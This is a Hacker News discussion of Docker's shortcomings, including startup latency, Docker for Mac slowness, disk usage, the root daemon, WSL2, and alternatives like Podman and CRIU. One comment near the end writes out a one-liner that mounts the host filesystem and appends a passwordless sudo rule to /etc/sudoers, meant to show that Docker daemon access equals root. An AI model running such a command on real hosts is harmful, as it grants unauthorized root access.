    - Docker containers are OS independent as well, but rely on Linux kernel features so they run more native on Linux. This isn't a negative. Most microservice apps are Linux-based.

    - Adding abstractions for the chipset has always been slower than optimizing and compiling for multiple architectures. This is like someone saying Java is better because it provides a VM that translates everything. Instead Java has a reputation for being clunky and slow because of it. Well built apps and pipelines can easily be compiled for multiple architectures. See Alpine Linux for example.

  • jdnenej 5 years ago

    This sounds like a great idea. Docker on ARM is such a pain if you aren't building everything yourself because half the packages are x86 only

    • geerlingguy 5 years ago

      More than half, I’d say 90%.

  • ctidd 5 years ago

    Looks like an interesting project. I know the website isn't responsive, but adjusting the current meta viewport declaration would go a long way while you're working on a full solution. The minimum zoom of 1 makes it unusable in practice right now on a small mobile viewport due to the amount of panning it forces you to do.

  • scanr 5 years ago

    Wasmer looks interesting.

    I couldn’t read much as I get an “unexpected error” as soon as I start scrolling. It does say that it’s not optimised for mobile.

    • syrusakbary 5 years ago

      Thanks for reporting it!

      We will investigate and try to fix it ASAP :)

      PS: if you could provide your device info (os and browser) it would be awesome

      • jackalo 5 years ago

        The black terminal next to the “Try It Now” remains blank while the cursor box zooms around it. No visible text is seen.

        iPhone XS Max, iOS 13 GM, Safari.

      • yoz 5 years ago

        Also seeing it on an iPhone 8, iOS 12.4. The site is completely unusable/unreadable.

aledalgrande 5 years ago

These are real problems with docker, but do we wanna talk about docker for Mac? A total performance disaster.

https://github.com/docker/for-mac/issues?q=is%3Aissue+is%3Ao...

  • thosakwe 5 years ago

    I have no idea how, but Docker for Mac was taking up a whopping 65GB of space in one of the cache folders in ~/Library, although I had uninstalled it months ago. I wish I had taken a screenshot, but I was honestly dumbfounded. I had used it maybe once, ever.

    EDIT: It turns out I’m not making this up/an edge case, at least 940 people have run into this too: https://github.com/docker/for-mac/issues/371

    • etimberg 5 years ago

      I have that problem too. The solution seemed to be to set up an alias to clean out old images, volumes, etc., and run that every so often.
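
      Something like (flags per the docker CLI; adjust to taste):

          alias docker-clean='docker system prune --all --volumes -f'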

      • mirimir 5 years ago

        Not just on macOS. Over time, Docker can eat all your storage.

        • jdnenej 5 years ago

          Because it keeps around all of the images you use, as well as the containers after they are stopped, so you can resume them. There is a command you can use that automatically removes all unused images and containers.

          • mirimir 5 years ago

            True. But there are situations where things get ~corrupted, and it becomes ~impossible to recover without basically nuking everything. But then, I was running containers with resource limits and long-term storage. So I could have thousands of lightweight "VMs" per physical server.

      • wp381640 5 years ago

        those scripts are now built into docker with `docker system prune`

        • smudgymcscmudge 5 years ago

          “docker system prune” is a recipe for pegging my cpu for the next few hours.

          • aledalgrande 5 years ago

            It used to be; with Docker for Mac v2 it became fast for me. Problem is I don't wanna be wiping out dozens of images, figuring out which ones I wanna keep, etc. I want a configuration setting saying "keep X versions" and the rest will automatically get pruned.

          • techntoke 5 years ago

            If that is the case then you likely have something misconfigured, or are running on seriously underpowered hardware or in a VM that needs more resources allocated to it.

        • semerda 5 years ago

          Little changed after I ran this script. My ~/Library/Containers/com.docker.docker/ is a whopping 64.01 GB.

          Running 'docker system prune' only recovers: Total reclaimed space: 1.986GB

          But when I check ~/Library/Containers/com.docker.docker/ for size after prune it still says 64.01 GB.

          Am I doing something wrong or is 'docker system prune' useless?

      • dawnerd 5 years ago

        The issue linked is that it doesn't actually reclaim the space - you either have to wipe it out or do the workaround mentioned to resize it manually.

  • devin 5 years ago

    Seriously. It's absolute trash. I don't even want to think about how much time I've lost waiting for startup and teardown operations.

    Edit: Before you downvote me too heavily, go give the issues list a thorough read. Some of the problems are quite bad. Perhaps I could have said it in a nicer way, but really, it's bad, and it's been bad for a good long while now.

  • djsumdog 5 years ago

    I hate how the Docker team called it native. Docker for Mac/Windows still run in a hypervisor because so much of Docker is specific to Linux/cgroups. There was a FreeBSD port of Docker that attempted to implement a lot of the Docker API using zfs+jails but it went unmaintained and was never ported to the newer modular Docker implementation.

    You're always going to get that performance hit with the hypervisor layer there.

    • teraflop 5 years ago

      > Docker for Mac/Windows still run in a hypervisor because so much of Docker is specific to Linux/cgroups.

      As I understand it, what you describe is true of Docker for Mac, but not Docker for Windows, which uses Windows' built-in container support (analogous to cgroups).

      https://stefanscherer.github.io/how-to-run-lightweight-windo...

      • nitemice 5 years ago

        As far as I understand it, that only applies to Windows-based containers running on Win 10 Pro/Enterprise or Win Server 2016.

        • amanzi 5 years ago

          This is true. Linux containers still require the VM running in Hyper-V in the background.

    • charles_f 5 years ago

      Docker for Windows is moving to WSL 2; a beta is already out.

      • lojack 5 years ago

        WSL 2 itself uses a hypervisor though, so this is sort of a moot point.

        • addicted 5 years ago

          Is this correct? I thought the headline feature of WSL2 was that unlike WSL it didn't use the hypervisor.

          Edit: I looked it up. WSL2 continues to use a VM.

          https://devblogs.microsoft.com/commandline/announcing-wsl-2/

          • skissane 5 years ago

            > Is this correct? I thought the headline feature of WSL2 was that unlike WSL it didn't use the hypervisor.

            No, the headline feature of WSL2 is it uses a real Linux kernel under a hypervisor, as opposed to WSL1's approach of a kernel driver running inside the NT kernel which partially emulates the Linux syscall API.

            > Edit: I looked it up. WSL2 continues to use a VM.

            More accurately, WSL2 starts using a VM, whereas WSL1 didn't. WSL2 runs the Linux kernel inside a VM. WSL1 runs Linux processes under the NT kernel (albeit as a special type of lightweight process called a picoprocess), with an emulation layer to translate Linux syscalls into NT kernel calls.

          • Mister_Snuggles 5 years ago

            You've got it backwards.

            WSL was a translation layer between Linux and Windows, WSL2 uses Hyper-V (I believe with some special sauce to handle integration).

          • teppifk 5 years ago

            WSL2 doesn't continue to use a VM, it is new in that it uses a VM. WSL1 did not use a VM, it directly interfaced with the NT executive.

      • sigjuice 5 years ago

        Calling it “Docker for Windows” is still highly inappropriate and misleading. It is super confusing.

    • smudgymcscmudge 5 years ago

      I preferred the old mac solution where they didn’t try to hide the vm from you. It was much more straightforward.

      • jsmeaton 5 years ago

        I personally disagree. I hated the whole docker-machine rubbish and exporting of the env vars.

        That doesn't make the performance problems of docker-for-mac any less nasty though.

  • dawnerd 5 years ago

    I just recently switched to using VS Code with the remote SSH plugin, set up an Ubuntu VM on my Windows machine, and performance is like 100x better.

    Docker for mac is basically dead to me now, going to finish migrating my projects over to the VM and uninstall it from my laptop.

    • yoube 5 years ago

      Have you tried running the VS Code + Linux Subsystem + Docker on Windows stack? It's been pretty good so far (a good writeup on this is at https://nickjanetakis.com/blog/setting-up-docker-for-windows...)

      • nickjj 5 years ago

        Thanks for sharing that link, author here.

        Yeah I don't know why but on Windows the volume performance generally seems to be a lot better than Mac.

        I have nothing but good things to say even on 5 year old hardware. Massive web apps (including using webpack) are very very speedy with volumes with a number of different stacks (flask, rails, phoenix, webpack, node).

        I still use that set up years later and it's really solid.

  • EamonnMR 5 years ago

    For all of its slowness, and constantly filling my hard drive with old builds because that's the workflow for some reason, it solves the real problem of macOS constantly breaking packages. That alone makes it worth it.

    • james_s_tayler 5 years ago

      Yeah. I have to run docker system prune from time to time.

  • par 5 years ago

    Docker for Mac is a performance nightmare. It requires a state-of-the-art $3400 MacBook Pro to run properly, and even then it still takes seconds (or 10s of seconds) to spin up, start local servers, etc. Build processes take 3-10x longer running on Docker for Mac than they would locally. The whole thing can be quite frustrating.

  • month13 5 years ago

    Wondering if it's worthwhile just rolling my own VM and running whatever I want in there. I'd lose the ability to bind to my host's ports, but would be able to control the daemon a bit better.

djsumdog 5 years ago

These are all pretty good points. I can understand why Docker allows any base-layer OS, but they could have made their own packages or limited it to a single distro, and it would be easier to check for outdated packages and security issues in containers.

The cgroups and Linux specific hooks keep Docker from being implemented natively anywhere else. The fact you have to share the entire Docker socket for containers to be able to control other containers, or that it's not trivial to run Docker-in-Docker, is terrible.

I did a similar writeup about the things I hate about container orchestration systems:

https://penguindreams.org/blog/my-love-hate-relationship-wit...

  • imiric 5 years ago

    > The fact you have to share the entire Docker socket for containers to be able to control other containers, or that it's not trivial to run Docker-in-Docker, is terrible.

    FWIW, if you enable the remote API, which, granted, isn't as trivial to do securely as it should be[1], then you can connect from any Docker client by simply setting the `DOCKER_HOST` env var and using the right TLS certs. This makes Docker-in-Docker much easier to manage, avoids the security issues of sharing the Unix socket, and works remotely of course.

    [1]: https://docs.docker.com/engine/security/https/
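
    From the client side it's then just (host and cert paths illustrative):

        export DOCKER_HOST=tcp://docker-host.example.com:2376
        export DOCKER_TLS_VERIFY=1
        export DOCKER_CERT_PATH=~/.docker/remote-certs
        docker ps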

    • djsumdog 5 years ago

      I created an ansible role that does this for me:

      https://github.com/sumdog/bee2/blob/master/ansible/roles/doc...

      It creates client certs and copies them locally too, so I can connect to Docker remotely over a VPN. Still this doesn't solve the original problem I talked about. It's not about securely connecting to the daemon. Even if you connect securely, you still essentially have root access on the host machine.

      I've considered writing a proxy that restricts what commands can be forwarded on to the Docker host socket (e.g. allowing for container IPs x,y and z to restart containers, but not to create new ones or pull images). There doesn't seem to be fine grained security or roles built into the docker daemon itself.

      Running docker in a docker container would give you a throwaway docker to use for things like Jenkins, GitLab CI, and other build tools without directly giving it root access on the host.

      • imiric 5 years ago

        > Even if you connect securely, you still essentially have root access on the host machine.

        Your original point was about the pain of sharing the Unix socket to control other containers, so that's why I brought up the API approach.

        It's been a while since I used Docker, but have you tried enabling user namespace remapping[1]? I remember it working as documented, and don't see why it wouldn't work remotely or DiD. There's also experimental rootless support since 19.03[2], maybe give that a try. Other than that, make sure you trust the images you run, or preferably, inspect every Dockerfile, ensure that the process runs as an unprivileged user, and build everything from scratch yourself.

        I agree with you that this is a major security issue, but we've known that since its introduction, and things seem to be improving, albeit slowly.

        Thankfully, nowadays there is other OCI-compatible tooling you can use and sidestep Docker altogether. Podman[3] is growing on me, mostly because of rootless support, though it's not without its issues and limitations.

        [1]: https://docs.docker.com/engine/security/userns-remap/

        [2]: https://github.com/moby/moby/blob/master/docs/rootless.md

        [3]: https://podman.io/

  • krferriter 5 years ago

    We were using Docker-in-Docker in our cluster to run user-defined containers, and something about it resulted in the outer container's disk usage blowing up to something like 20 GiB per container, I think due to the overlay filesystem driver. We were under a time constraint, so we just grew all the host root filesystems, but it was inconvenient and not cheap to do. I have to assume it also had a drastic negative impact on storage I/O performance in the inner container.

    • geggam 5 years ago

      Docker in Docker feels like a root kit generator to me

alpb 5 years ago

Nearly all the points the author mentions (daemonless runtimes, daemonless builds) have been addressed by the open source ecosystem in smaller standalone projects.

Docker provides a nice high-level layer for the end user on the developer machine. Its CLI is efficient, and so are its builds when they're local and cached. I still use it on my dev machine despite being aware of the alternatives.

Any security-aware company using containers in production will most likely go with non-Docker approaches. Some notable examples include runc, Podman, Buildah, img, ko, and Bazel/distroless.
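
For instance, a daemonless build-and-run with two of those, assuming a plain Dockerfile in the current directory:

    buildah bud -t myapp .  # build from the Dockerfile, no daemon involved
    podman run --rm myapp   # run it, also without a daemon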

  • solipsism 5 years ago

    Distroless is not non-Docker, it's very much Docker.

    • alpb 5 years ago

      Please explain.

      You can build images using Bazel with distroless as the base image. Similarly I think Jib/ko use distroless images without needing a docker engine.

      • solipsism 5 years ago

        The thing you build is a Docker image.

        • alpb 5 years ago

          Technically it's an OCI image, nothing in your argument relates to anything the original article mentions, and you can run the resulting image without Docker, so at this point your argument sounds like random blabber, sorry.

jbergknoff 5 years ago

It's interesting to see the complaint about containers starting too slowly. I haven't seen much discussion about it before this article and this comment thread, but it's one of my biggest pain points with Docker. I know we can save some time by skipping some namespaces (e.g. `--net host`) but I've still never been able to get satisfyingly fast container execution in that way. (e.g. `time echo` -> 0.000s, `time docker run --rm alpine echo` -> 1.3s; come to think of it, this is even slower than it used to be)
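
Spelled out, with the `--net host` variant included (numbers from my machine; yours will vary):

    time echo                                    # real 0m0.000s
    time docker run --rm alpine echo             # real 0m1.3s
    time docker run --rm --net host alpine echo  # a bit faster, still nowhere near native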

Still, Docker is the best method that I've seen for distributing software, especially cross-platform. Not just for shipping a containerized web app to production, but also running dev tools (e.g. linters, compilers) and other desktop and CLI applications. I know some people run lots of stuff in containers (https://github.com/jessfraz/dockerfiles, probably the most prolific), but I think this is a largely underappreciated facet of Docker.

My team at work is heavily Mac while I'm on Linux. The dev workflows are identical on my machine, on their machines, and in Jenkins. Nobody has to have a snowflake setup, installing this or that version of Python, we're all just `docker run`ning the same image. It's great.
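
A hypothetical example of the pattern (image and tool are just placeholders):

    # same formatter, same version, on every machine and in CI
    docker run --rm -v "$PWD":/src -w /src golang:1.13 gofmt -l .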

Unfortunately, Docker for Mac's IO performance is abysmal. If past performance is any indication of future results, that's never going to change. I'm constantly on the lookout for other ways to share tools cross-platform that don't involve Docker. Things like podman and binctr are exciting, and I've played with them, but I don't see them filling this niche.

atarian 5 years ago

I just want to be able to save a container binary to a USB drive and then run it from a different computer without having to install anything.

  • astockwell 5 years ago

    The first time I emailed a buddy a Go cross-compiled binary and he opened it and it ran no problem (opsec aside), our worlds changed.

    • atarian 5 years ago

      This is exactly how I'd like containers to be as well.

  • TheChaplain 5 years ago

    I believe that already exists and is called "AppImage".

  • techntoke 5 years ago

    Installing Docker or another container runtime is easy. I'd suggest creating a portable OS that you can boot from USB, or creating a local registry. You may also want to consider just creating a script to bind mount the binaries.

  • lytedev 5 years ago

    There are a number of ways to get this kind of functionality. Can you expound on "different computer"?

    • juandazapata 5 years ago

      What part of "different computer" is confusing to you?

      • fwip 5 years ago

        How different, for one.

        Are they running the same OS? The same architecture? Do they have any software installed?

est 5 years ago

All I want is a process that can be frozen and copied to multiple servers.

Start/stop is merely a state change.

  • soraminazuki 5 years ago

    You’d be much better off using a VM if you want snapshots. Process snapshots require that you can:

    1. extract all kernel state related to the target process

    2. replicate the state on another machine

    Both of these are extremely complicated problems.

    The first problem is difficult because it’s nearly impossible to isolate all relevant state in the kernel. Process state is closely intertwined with the entire kernel state, making it all too easy to produce an incomplete snapshot that can break the system in all sorts of ways. Worse, things would get more complicated if multiple processes are involved.

    The second problem is just as hard if you consider external dependencies or different kernel versions. It might simply be impossible to recreate the process even if you did succeed in creating the perfect snapshot.

    Process snapshots are simply not worth the trouble.

  • ethagnawl 5 years ago

    This sounds a lot like the Smalltalk VM.

  • ehotinger 5 years ago

    That's quite an oversimplification of the problem; copying the stack/heap/etc. is only the start. Anyway, check out CRIU as a starting point.
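
    Very roughly, and with big caveats around TTYs, open sockets, and kernel versions (PID and paths here are illustrative):

        mkdir -p /tmp/ckpt
        sudo criu dump -t 1234 -D /tmp/ckpt --shell-job  # checkpoint the process tree to disk
        # ship /tmp/ckpt to a compatible machine, then:
        sudo criu restore -D /tmp/ckpt --shell-job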

    • e12e 5 years ago

      (And note that LXD/LXC allows migration based on it. Not sure about copying - I suspect you run into similar issues as with fork: who owns the open file handles and other resources?)

  • lytedev 5 years ago

    This is interesting... May I ask why this is an important feature to you?

    • est 5 years ago

      If you think about it, most services, web or RPC, can be scaled this way.

broknbottle 5 years ago

switch to podman?

https://podman.io/

  • k__ 5 years ago

    I saw it can be used as a drop-in replacement.
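
    The usual trick, as I understand it, is just:

        alias docker=podman
        docker run --rm -it alpine sh  # actually runs under podman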

    Does podman have better startup performance than docker?

    I'm using Docker to debug and it's a bit of a pain.

anordal 5 years ago

... then I suppose Selfdock is for you.

* Does not give or require root.

* Fast: Does not write to disk.

* Fast: Does not allocate memory.

* No daemon.

https://github.com/anordal/selfdock

  • aequitas 5 years ago

    > Give up the idea of data volume containers. Given that volumes are the way to go, no other filesystems in the container need to, or should be, writable.

    Interesting philosophy. It will pose some issues when replicating a Docker-'build'-style system, though that could be separated from the 'run' system with cached layers.

    edit: Btw, Docker also seems to support this: https://nickjanetakis.com/blog/docker-tip-55-creating-read-o.... It also allows explicit creation of writable tmpfs mountpoints.
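
    Something like this, if I'm reading those docs right:

        # read-only rootfs, with an explicit writable tmpfs where needed
        docker run --rm --read-only --tmpfs /tmp alpine \
            sh -c 'touch /tmp/ok; touch /etc/fail'  # second touch fails: read-only fs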

  • k__ 5 years ago

    I read podman can be simply aliased to docker and it works. Is this the case for selfdock too?

devmunchies 5 years ago

Do BSD jails solve these problems? From the little I know of them, they're good at containerization but don't solve the distribution problem that Docker containers do.

rotten 5 years ago

I'd like it to be more like git. Yes, Docker has "push" and "pull", but I want branches, automatic attach when I do a checkout, and rollback when I screw it up.

As a developer I'd like to be able to check out a docker image, work _in_ it, and merge it to master when I'm done. When my code is deployed, I'll know _exactly_ what is running.

Managing secrets and environments (so the container knows when it is in production instead of running on a developer's laptop) is important to get this to work well.

It feels like it is halfway there already. I'm looking forward to when it is as straightforward as git for a developer to use. I'm not too worried about startup time - the biggest drawback of slow startup is when you are running very sensitive autoscaling that tears down and spins up new nodes very quickly. If you have that problem, you may want to rethink your node size, hysteresis, and scaling thresholds.

peterwwillis 5 years ago

Containers Without Docker: https://dzone.com/articles/containers-with-out-docker

Dockerless: https://mkdev.me/en/posts/dockerless-part-1-which-tools-to-r... https://dzone.com/articles/dockerless-part-1-which-tools-to-...

What's funny is, Docker is only actually useful because of how many features it has, all its supported platforms, all its bloat. You won't ever be totally satisfied with any alternative because it takes so long to make something like Docker, and someone will always need that one extra feature.

mschuster91 5 years ago

> In fact, a global system daemon should not be needed.

You will need a daemon running as root to bind to ports below 1024.

In addition, in many cases you want a bind-mount onto your filesystem that also supports arbitrary UIDs/GIDs on files, which means you will need a root daemon. The problem, of course, is that anyone with access to the Docker daemon can simply say "bind host / to container /mnt" and then hijack /etc/sudoers for privilege escalation on the host.
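
Concretely, the escalation is a one-liner (the username is a placeholder):

    # anyone who can talk to the daemon can do this:
    docker run --rm -v /:/mnt alpine \
        sh -c 'echo "eve ALL=(ALL) NOPASSWD:ALL" >> /mnt/etc/sudoers'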

You can't have both usable containers and a system that is secure against privilege escalation: by its users at the very least, and, when docker-in-docker is implemented by bind-mounting the Docker socket into the container, by anyone who accesses the container and achieves RCE there.

bokieie 5 years ago

We tried to use LXC directly and realized that Docker simply does it all for us, and better.

tigroferoce 5 years ago

Besides technical considerations, the main point of Docker, to me, is its ubiquity. Just like the physical shipping containers it takes its inspiration from, you can find Docker almost everywhere. It has become a lingua franca for DevOps, even in enterprise environments, and it will be very difficult to get rid of.

CruzeDon 5 years ago

It's absolute trash

notyourday 5 years ago

Have you heard of this amazing thing called "a VM"? It is like Docker, but when you pee at the wall it always splashes right back at you, so you quickly learn that you never want to pee at the wall.